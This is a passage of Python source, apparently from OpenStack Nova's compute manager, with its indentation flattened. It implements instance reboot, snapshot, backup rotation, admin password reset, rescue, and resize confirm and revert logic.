for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info("Detaching from volume api: %s", volume_id)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = task_states.soft_reboot_states
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = task_states.hard_reboot_states
context = context.elevated()
LOG.info("Rebooting instance", instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.START,
bdms=bdms
)
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)',
{'state': state, 'running': running},
instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning('Reboot failed but instance is running',
instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.ERROR,
exception=error, bdms=bdms
)
ctxt.reraise = False
else:
LOG.error('Cannot reboot instance: %s', error,
instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning("Instance disappeared during reboot",
instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.END,
bdms=bdms
)
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance):
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param image_id: glance.db.sqlalchemy.models.Image.Id
:param instance: a nova.objects.instance.Instance object
"""
# NOTE(dave-mcnally) the task state will already be set by the api
# but if the compute manager has crashed/been restarted prior to the
# request getting here the task state may have been cleared so we set
# it again and things continue normally
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# possibility instance no longer exists, no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info('instance snapshotting', instance=instance)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)',
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
compute_utils.notify_about_instance_snapshot(context, instance,
self.host, phase=fields.NotificationPhase.START,
snapshot_image_id=image_id)
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
compute_utils.notify_about_instance_snapshot(context, instance,
self.host, phase=fields.NotificationPhase.END,
snapshot_image_id=image_id)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image = self.image_api.get(context, image_id)
if image['status'] != 'active':
self.image_api.delete(context, image_id)
except Exception:
LOG.warning("Error while trying to clean up image %s",
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
LOG.warning("Image not found during snapshot", instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: a user-defined type, like "daily" or "weekly" etc.
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in range(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
try:
self.image_api.delete(context, image_id)
except exception.ImageNotFound:
LOG.info("Failed to find image %(image_id)s to "
"delete", {'image_id': image_id},
instance=instance)
except (exception.ImageDeleteConflict, Exception) as exc:
LOG.info("Failed to delete image %(image_id)s during "
"deleting excess backups. "
"Continuing for next image.. %(exc)s",
{'image_id': image_id, 'exc': exc},
instance=instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info("Admin password set", instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except exception.InstanceAgentNotEnabled:
with excutils.save_and_reraise_exception():
LOG.debug('Guest agent is not enabled for the instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except exception.SetAdminPasswdNotSupported:
with excutils.save_and_reraise_exception():
LOG.info('set_admin_password is not supported '
'by this driver or guest instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning('set_admin_password is not implemented '
'by this driver or guest instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception('set_admin_password failed', instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
LOG.warning('trying to inject a file into a non-running '
'(state: %(current_state)s expected: '
'%(expected_state)s)',
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
LOG.info('injecting file to %s', path, instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning('Unable to find a different image to use for '
'rescue VM, using instance\'s current image',
instance=instance)
rescue_image_ref = instance.image_ref
return objects.ImageMeta.from_image_ref(
context, self.image_api, rescue_image_ref)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref, clean_shutdown):
context = context.elevated()
LOG.info('Rescuing', instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self.network_api.get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
self._get_image_name(rescue_image_meta)}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
compute_utils.notify_about_instance_rescue_action(
context, instance, self.host, rescue_image_ref,
action=fields.NotificationAction.RESCUE,
phase=fields.NotificationPhase.START)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception("Error trying to Rescue Instance",
instance=instance)
self._set_instance_obj_error_state(context, instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
compute_utils.notify_about_instance_rescue_action(
context, instance, self.host, rescue_image_ref,
action=fields.NotificationAction.RESCUE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info('Unrescuing', instance=instance)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNRESCUE,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNRESCUE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def confirm_resize(self, context, instance, migration):
"""Confirms a migration/resize and deletes the 'old' instance.
This is called from the API and runs on the source host.
Nothing needs to happen on the destination host at this point since
the instance is already running there. This routine just cleans up the
source host.
"""
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error("Migration %s is not found during confirmation",
migration_id, instance=instance)
return
if migration.status == 'confirmed':
LOG.info("Migration %s is already confirmed",
migration_id, instance=instance)
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation process",
{"status": migration.status, "id": migration_id},
instance=instance)
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info("Instance is not found during confirmation",
instance=instance)
return
self._confirm_resize(context, instance, migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_CONFIRM,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance):
# NOTE(danms): delete stashed migration information
old_instance_type = instance.old_flavor
instance.old_flavor = None
instance.new_flavor = None
instance.system_metadata.pop('old_vm_state', None)
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self.network_api.get_instance_nw_info(context,
instance)
# TODO(mriedem): Get BDMs here and pass them to the driver.
self.driver.confirm_migration(context, migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker()
rt.drop_move_claim(context, instance, migration.source_node,
old_instance_type, prefix='old_')
self._delete_allocation_after_move(context, instance, migration,
old_instance_type,
migration.source_node)
instance.drop_migration_context()
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING,
task_states.SOFT_DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_CONFIRM,
phase=fields.NotificationPhase.END)
def _delete_allocation_after_move(self, context, instance, migration,
flavor, nodename):
rt = self._get_resource_tracker()
cn_uuid = rt.get_node_uuid(nodename)
if migration.source_node == nodename:
if migration.status in ('confirmed', 'completed'):
# NOTE(danms): We're finishing on the source node, so try to
# delete the allocation based on the migration uuid
deleted = self.reportclient.delete_allocation_for_instance(
context, migration.uuid)
if deleted:
LOG.info(_('Source node %(node)s confirmed migration '
'%(mig)s; deleted migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
# NOTE(danms): We succeeded, which means we do not
# need to do the complex double allocation dance
return
else:
# We're reverting (or failed) on the source, so we
# need to check if our migration holds a claim and if
# so, avoid doing the legacy behavior below.
mig_allocs = (
self.reportclient.get_allocations_for_consumer_by_provider(
context, cn_uuid, migration.uuid))
if mig_allocs:
LOG.info(_('Source node %(node)s reverted migration '
'%(mig)s; not deleting migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
return
elif migration.dest_node == nodename:
# NOTE(danms): We're reverting on the destination node
# (and we must not be doing a same-host migration if we
# made it past the check above), so we need to check to
# see if the source did migration-based allocation
# accounting
allocs = (
self.reportclient.get_allocations_for_consumer_by_provider(
context, cn_uuid, migration.uuid))
if allocs:
# NOTE(danms): The source did migration-based allocation
# accounting, so we should let the source node rejigger
# the allocations in finish_resize_revert()
LOG.info(_('Destination node %(node)s reverted migration '
'%(mig)s; not deleting migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
return
# TODO(danms): Remove below this line when we remove compatibility
# for double-accounting migrations (likely rocky)
LOG.info(_('Doing legacy allocation math for migration %(mig)s after '
'instance move'),
{'mig': migration.uuid},
instance=instance)
# NOTE(jaypipes): This sucks, but due to the fact that confirm_resize()
# only runs on the source host and revert_resize() runs on the
# destination host, we need to do this here. Basically, what we're
# doing here is grabbing the existing allocations for this instance
# from the placement API, dropping the resources in the doubled-up
# allocation set that refer to the source host UUID and calling PUT
# /allocations back to the placement API. The allocation that gets
# PUT'd back to placement will only include the destination host and
# any shared providers in the case of a confirm_resize operation and
# the source host and shared providers for a revert_resize operation..
if not scheduler_utils.remove_allocation_from_compute(
context, instance, cn_uuid, self.reportclient, flavor):
LOG.error("Failed to save manipulated allocation",
instance=instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context,
instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
# NOTE(ndipanov): We need to do this here because dropping the
# claim means we lose the migration_context data. We really should
# fix this by moving the drop_move_claim call to the
# finish_revert_resize method as this is racy (revert is dropped,
# but instance resources will be tracked with the new flavor until
# it gets rolled back in finish_revert_resize, which is
# potentially wrong for a period of time).
instance.revert_migration_context()
instance.save()
rt = self._get_resource_tracker()
rt.drop_move_claim(context, instance, instance.node)
self._delete_allocation_after_move(context, instance, migration,
instance.flavor,
instance.node)
# RPC cast back to the source host to finish the revert there.
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, migration):
"""Finishes the second half of reverting a resize on the source host.
Bring the original source instance state back (active/shutoff) and
revert the resized attributes in the database.
"""
with self._error_out_instance_on_exception(context, instance):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_REVERT,
phase=fields.NotificationPhase.START, bdms=bdms)
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
self._set_instance_info(instance, instance.old_flavor)
instance.old_flavor = None
instance.new_flavor = None
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
self._revert_allocation(context, instance, migration)
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
migration_p = obj_base.obj_to_primitive(migration)
# NOTE(hanrong): we need to change migration_p['dest_compute'] to
# source host temporarily. "network_api.migrate_instance_finish"
# will setup the network for the instance on the destination host.
# For revert resize, the instance will back to the source host, the
# setup of the network for instance should be on the source host.
# So set the migration_p['dest_compute'] to source host at here.
migration_p['dest_compute'] = migration.source_compute
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context,
instance)
# revert_resize deleted any volume attachments for the instance
# and created new ones to be used on this host, but we
# have to update those attachments with the host connector so the
# BDM.connection_info will get set in the call to
# _get_instance_block_device_info below with refresh_conn_info=True
# and then the volumes can be re-connected via the driver on this
# host.
self._update_volume_attachments(context, instance, bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True, bdms=bdms)
power_on = old_vm_state != vm_states.STOPPED
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.drop_migration_context()
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
# Complete any volume attachments so the volumes are in-use.
self._complete_volume_attachments(context, bdms)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info("Updating instance to original state: '%s'",
old_vm_state, instance=instance)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance,
clean_shutdown=True)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_REVERT,
phase=fields.NotificationPhase.END, bdms=bdms)
def _revert_allocation(self, context, instance, migration):
"""Revert an allocation that is held by migration to our instance."""
# Fetch the original allocation that the instance had on the source
# node, which are now held by the migration
orig_alloc = self.reportclient.get_allocations_for_consumer(
context, migration.uuid)
if not orig_alloc:
# NOTE(danms): This migration did not do per-migration allocation
# accounting, so nothing to do here.
LOG.info('Old-style migration %(mig)s is being reverted; '
'no migration claims found on original node '
'to swap.',
{'mig': migration.uuid},
instance=instance)
return False
if len(orig_alloc) > 1:
# NOTE(danms): This may change later if we have other allocations
# against other providers that need to be held by the migration
# as well. Perhaps something like shared storage resources that
# will actually be duplicated during a resize type operation.
LOG.error('New-style migration %(mig)s has allocations against '
'more than one provider %(rps)s. This should not be '
'possible, but reverting it anyway.',
{'mig': migration.uuid,
'rps': ','.join(orig_alloc.keys())},
instance=instance)
# We only have a claim against one provider, it is the source node
cn_uuid = list(orig_alloc.keys())[0]
# Get just the resources part of the one allocation we need below
orig_alloc = orig_alloc[cn_uuid].get('resources', {})
# FIXME(danms): This method is flawed in that it asssumes allocations
# against only one provider. So, this may overwite allocations against
# a shared provider, if we had one.
LOG.info('Swapping old allocation on %(node)s held by migration '
'%(mig)s for instance',
{'node': cn_uuid, 'mig': migration.uuid},
instance=instance)
# TODO(cdent): Should we be doing anything with return values here?
self.reportclient.set_and_clear_allocations(
context, cn_uuid, instance.uuid, orig_alloc, instance.project_id,
instance.user_id, consumer_to_clear=migration.uuid)
return True
def _prep_resize(self, context, image, instance, instance_type,
filter_properties, node, migration, clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_obj_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
# if the flavor IDs match, it's migrate; otherwise resize
if same_host and instance_type.id == instance['instance_type_id']:
# check driver whether support migrate to same host
if not self.driver.capabilities['supports_migrate_to_same_host']:
raise exception.UnableToMigrateToSelf(
instance_id=instance.uuid, host=self.host)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.new_flavor = instance_type
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker()
with rt.resize_claim(context, instance, instance_type, node,
migration, image_meta=image,
limits=limits) as claim:
LOG.info('Migrating', instance=instance)
# RPC cast to the source host to start the actual resize/migration.
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
request_spec, filter_properties, node,
clean_shutdown, migration, host_list):
"""Initiates the process of moving a running instance to another host.
Possibly changes the VCPU, RAM and disk size in the process.
This is initiated from conductor and runs on the destination host.
The main purpose of this method is performing some checks on the
destination host and making a claim for resources. If the claim fails
then a reschedule to another host may be attempted which involves
calling back to conductor to start the process over again.
"""
if node is None:
node = self._get_nodename(instance, refresh=True)
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
compute_utils.notify_about_resize_prep_instance(
context, instance, self.host,
fields.NotificationPhase.START, instance_type)
try:
self._prep_resize(context, image, instance,
instance_type, filter_properties,
node, migration, clean_shutdown)
except Exception:
# Since we hit a failure, we're either rescheduling or dead
# and either way we need to cleanup any allocations created
# by the scheduler for the destination node.
if migration and not self._revert_allocation(
context, instance, migration):
# We did not do a migration-based
# allocation. Note that for a resize to the
# same host, the scheduler will merge the
# flavors, so here we'd be subtracting the new
# flavor from the allocated resources on this
# node.
# FIXME(danms): Remove this in Rocky
rt = self._get_resource_tracker()
rt.delete_allocation_for_failed_resize(
context, instance, node, instance_type)
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, request_spec,
filter_properties, host_list)
finally:
extra_usage_info = dict(
new_instance_type=instance_type.name,
new_instance_type_id=instance_type.id)
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
compute_utils.notify_about_resize_prep_instance(
context, instance, self.host,
fields.NotificationPhase.END, instance_type)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, request_spec, filter_properties, host_list):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info, host_list=host_list)
except Exception as error:
rescheduled = False
LOG.exception("Error trying to reschedule",
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.ERROR,
exception=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.ERROR,
exception=exc_info[1])
else:
# not re-scheduling
six.reraise(*exc_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def resize_instance(self, context, instance, image,
migration, instance_type, clean_shutdown):
"""Starts the migration of a running instance to another host.
